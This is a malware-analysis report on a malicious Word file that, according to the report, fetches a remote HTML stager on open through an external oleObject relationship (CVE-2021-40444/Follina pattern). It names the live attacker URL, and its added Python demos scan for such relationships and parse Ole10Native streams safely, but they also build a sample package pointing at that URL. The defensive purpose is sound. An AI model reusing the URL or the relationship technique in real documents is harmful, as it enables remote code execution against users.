Verdict: MALICIOUS
Risk Score: 220

Malware Insights

MITRE ATT&CK
- T1204.002 User Execution: Malicious File
- T1559.002 Inter-Process Communication: Component Object Model
The sample is a malicious OOXML (Word) document whose word/_rels/document.xml.rels carries an oleObject relationship marked external, with the target http://212.138.130.8/analysis.html. Office resolves an external oleObject target through its OLE object-update path when the document is opened, so the fetch happens without the user clicking a link. This is the delivery pattern of CVE-2021-40444 (MSHTML remote code execution), and the analyzer's gadget heuristic matched the relationship against that CVE. ClamAV flags the same file as Win.Exploit.CVE_2022_30190-9951234-1, a signature named for CVE-2022-30190 (Follina, the MSDT protocol-handler flaw), which is delivered through the same kind of external oleObject relationship. The two labels therefore agree on the delivery mechanism but not on which exploit chain the fetched HTML would trigger; the report does not include the contents of analysis.html, so that cannot be settled from the document alone. What is established is that opening the document causes an outbound request to attacker-controlled HTML, the stager for a second-stage payload, and the presence of an embedded OLE object alongside the external relationship is consistent with that intent.
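The relationship check described above, as an added example that is not the analyzer's own code: it opens an OOXML package, parses every .rels part, and flags external relationships whose target is a remote URL, ranking oleObject relationships above ordinary hyperlinks and also noting embedded OLE parts. The minimal package built by build_sample_docx() is constructed for the demo; only the relationship target is taken from this report.

```python
"""Scan an OOXML package for external oleObject relationships.

Added example, not the analyzer's own code. It reproduces the checks
behind the OOXML_EXTERNAL_OLE_OBJECT, OOXML_EXTERNAL_REL and
OOXML_OLE_OBJECT heuristics: open the zip, parse every .rels part, flag
relationships whose TargetMode is External and whose target is an
http/https/mhtml URL, and rank oleObject relationships above the rest.
The package built by build_sample_docx() is constructed for the demo;
only the relationship target comes from the report.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional
from urllib.parse import urlsplit

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
OLE_REL_TYPE = OFFICE_REL + "oleObject"
HYPERLINK_REL_TYPE = OFFICE_REL + "hyperlink"
REMOTE_SCHEMES = ("http", "https", "mhtml")


def scan_relationships(docx_bytes: bytes) -> List[Dict[str, Optional[str]]]:
    """Return one finding per external relationship or embedded OLE part."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            # Embedded OLE objects are stored as parts under */embeddings/.
            if "/embeddings/" in name:
                findings.append({"rule": "OOXML_OLE_OBJECT", "severity": "medium",
                                 "part": name, "target": None})
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue  # internal part reference, resolved inside the zip
                target = rel.get("Target", "")
                # Samples of this kind carry a trailing "!" on the target;
                # strip it only for scheme detection and report the raw string.
                scheme = urlsplit(target.rstrip("!")).scheme.lower()
                if scheme not in REMOTE_SCHEMES:
                    continue
                findings.append({"rule": "OOXML_EXTERNAL_REL", "severity": "medium",
                                 "part": name, "target": target})
                if rel.get("Type") == OLE_REL_TYPE:
                    # Office resolves this target through the OLE object update
                    # path on open, not through a user-clicked hyperlink.
                    findings.append({"rule": "OOXML_EXTERNAL_OLE_OBJECT",
                                     "severity": "high", "part": name,
                                     "target": target})
    return findings


def build_sample_docx(ole_target: str) -> bytes:
    """Constructed minimal package: a document part, one embedded OLE part,
    and a document.xml.rels with an external oleObject relationship plus an
    ordinary external hyperlink for contrast."""
    rels = (
        f'<Relationships xmlns="{PKG_REL_NS}">'
        f'<Relationship Id="rId1" Type="{OLE_REL_TYPE}" Target="{ole_target}" TargetMode="External"/>'
        f'<Relationship Id="rId2" Type="{HYPERLINK_REL_TYPE}" Target="https://example.com/" TargetMode="External"/>'
        f'<Relationship Id="rId3" Type="{OLE_REL_TYPE}" Target="embeddings/oleObject1.bin"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml",
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", rels)
        zf.writestr("word/embeddings/oleObject1.bin", b"\x00" * 16)
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_relationships(build_sample_docx("http://212.138.130.8/analysis.html!")):
        print(f"{f['severity']:6} {f['rule']:28} {f['part']}  {f['target'] or ''}")
```

Run against the constructed package, the external oleObject relationship produces both a medium OOXML_EXTERNAL_REL finding and a high OOXML_EXTERNAL_OLE_OBJECT finding for the same target, the hyperlink produces only the medium finding, and the embedded part produces OOXML_OLE_OBJECT, which mirrors how the report stacks its heuristics on one URL.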
Heuristics (6)

- External OLEObject gadget, CVE-2021-40444 [critical, CVE_2021_40444]
  External relationship to http://212.138.130.8/analysis.html! matches the exploitable external OLEObject gadget pattern for CVE-2021-40444.
  URL: http://212.138.130.8/analysis.html

- ClamAV detection [critical, CLAMAV_DETECTION]
  ClamAV detected this file as malware: Win.Exploit.CVE_2022_30190-9951234-1

- External OLE object relationship [high, OOXML_EXTERNAL_OLE_OBJECT]
  The document contains an oleObject relationship whose target is an external HTTP(S) URL. Office resolves this through the OLE/object update path rather than as a user-clicked hyperlink.
  URL: http://212.138.130.8/analysis.html

- External relationship [medium, OOXML_EXTERNAL_REL]
  External target in word/_rels/document.xml.rels: http://212.138.130.8/analysis.html!
  URL: http://212.138.130.8/analysis.html

- Embedded OLE object [medium, OOXML_OLE_OBJECT]
  The document contains an embedded OLE object.

- Ole10Native inner payload size exceeds remaining bytes [medium, OFFICE_PACKAGE_SIZE_MISMATCH]
  The inner `payloadSize` field declares more bytes than remain in the Ole10Native stream. A reader that allocates from this field and copies that many bytes without checking it against the stream length has an out-of-bounds read. Whether the mismatch is deliberate or an artefact of how the package was assembled, the stream cannot be parsed as a well-formed Ole10Native package.
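A bounds-checked Ole10Native parser, as an added example that is not the analyzer's own code, showing the check behind the OFFICE_PACKAGE_SIZE_MISMATCH heuristic. The layout assumed is the commonly documented Packager stream (u32 total size, u16 flags, NUL-terminated label, NUL-terminated source path, u16 and u32 flag fields, u32 temp-path length, temp path, u32 payload size, payload bytes); the field names and the OLE10NATIVE_TRUNCATED rule name are this example's own, and both streams built by build_ole10native() are constructed for the demo.

```python
"""Parse an Ole10Native (Packager) stream with the length checks that the
OFFICE_PACKAGE_SIZE_MISMATCH heuristic describes.

Added example, not the analyzer's own code. Assumed layout: u32 total size,
u16 flags, NUL-terminated label, NUL-terminated source path, u16 + u32 flag
fields, u32 temp-path length, temp path, u32 payload size, payload bytes.
Field names and the OLE10NATIVE_TRUNCATED rule name are this example's own;
the GOOD and BAD streams are constructed for the demo.
"""
import struct
from typing import Dict, Optional, Tuple


class Ole10NativeError(ValueError):
    def __init__(self, rule: str, msg: str):
        super().__init__(f"{rule}: {msg}")
        self.rule = rule


def _need(buf: bytes, off: int, n: int, what: str) -> None:
    """Refuse to read past the end of the stream (the OOB read the report warns about)."""
    if n < 0 or off + n > len(buf):
        raise Ole10NativeError(
            "OLE10NATIVE_TRUNCATED",
            f"{what}: need {n} bytes at offset {off}, {len(buf) - off} remain")


def _u32(buf: bytes, off: int, what: str) -> Tuple[int, int]:
    _need(buf, off, 4, what)
    return struct.unpack_from("<I", buf, off)[0], off + 4


def _cstring(buf: bytes, off: int, what: str) -> Tuple[bytes, int]:
    end = buf.find(b"\x00", off)
    if end < 0:
        raise Ole10NativeError("OLE10NATIVE_TRUNCATED",
                               f"{what}: no terminator from offset {off}")
    return buf[off:end], end + 1


def parse_ole10native(stream: bytes) -> Dict[str, object]:
    total, off = _u32(stream, 0, "total size")
    if total > len(stream) - 4:
        raise Ole10NativeError("OLE10NATIVE_TRUNCATED",
                               f"outer size {total} exceeds {len(stream) - 4} remaining bytes")
    _need(stream, off, 2, "flags")
    off += 2
    label, off = _cstring(stream, off, "label")
    src_path, off = _cstring(stream, off, "source path")
    _need(stream, off, 6, "flag fields")
    off += 6
    tmp_len, off = _u32(stream, off, "temp path length")
    _need(stream, off, tmp_len, "temp path")
    temp_path = stream[off:off + tmp_len].rstrip(b"\x00")
    off += tmp_len
    payload_size, off = _u32(stream, off, "payload size")
    remaining = len(stream) - off
    if payload_size > remaining:
        # The exact condition the report flags: a reader that trusts this
        # field for allocation and copy length reads past the stream.
        raise Ole10NativeError("OFFICE_PACKAGE_SIZE_MISMATCH",
                               f"payloadSize {payload_size} exceeds {remaining} remaining bytes")
    return {"label": label, "src_path": src_path, "temp_path": temp_path,
            "payload": stream[off:off + payload_size]}


def check_stream(stream: bytes) -> Optional[str]:
    """Return the rule that fires for this stream, or None if it parses cleanly."""
    try:
        parse_ole10native(stream)
    except Ole10NativeError as e:
        return e.rule
    return None


def build_ole10native(label: bytes, src_path: bytes, temp_path: bytes,
                      payload: bytes, claimed_size: Optional[int] = None) -> bytes:
    """Constructed stream; claimed_size overrides the true payload length."""
    tmp = temp_path + b"\x00"
    body = struct.pack("<H", 2) + label + b"\x00" + src_path + b"\x00"
    body += struct.pack("<HI", 0, 3)
    body += struct.pack("<I", len(tmp)) + tmp
    body += struct.pack("<I", len(payload) if claimed_size is None else claimed_size) + payload
    return struct.pack("<I", len(body)) + body


# Constructed samples: a consistent stream and one whose inner size field lies.
PAYLOAD = b"MZ" + b"\x90" * 30
GOOD = build_ole10native(b"update.exe", b"C:\\src\\update.exe", b"C:\\tmp\\update.exe", PAYLOAD)
BAD = build_ole10native(b"update.exe", b"C:\\src\\update.exe", b"C:\\tmp\\update.exe", PAYLOAD,
                        claimed_size=0x7FFFFFFF)

if __name__ == "__main__":
    print("good:", check_stream(GOOD), parse_ole10native(GOOD)["label"])
    print("bad: ", check_stream(BAD))
```

Every field read goes through _need(), so a stream truncated anywhere before the payload is reported as OLE10NATIVE_TRUNCATED, while a payload size larger than the bytes left is reported as OFFICE_PACKAGE_SIZE_MISMATCH before any copy is attempted.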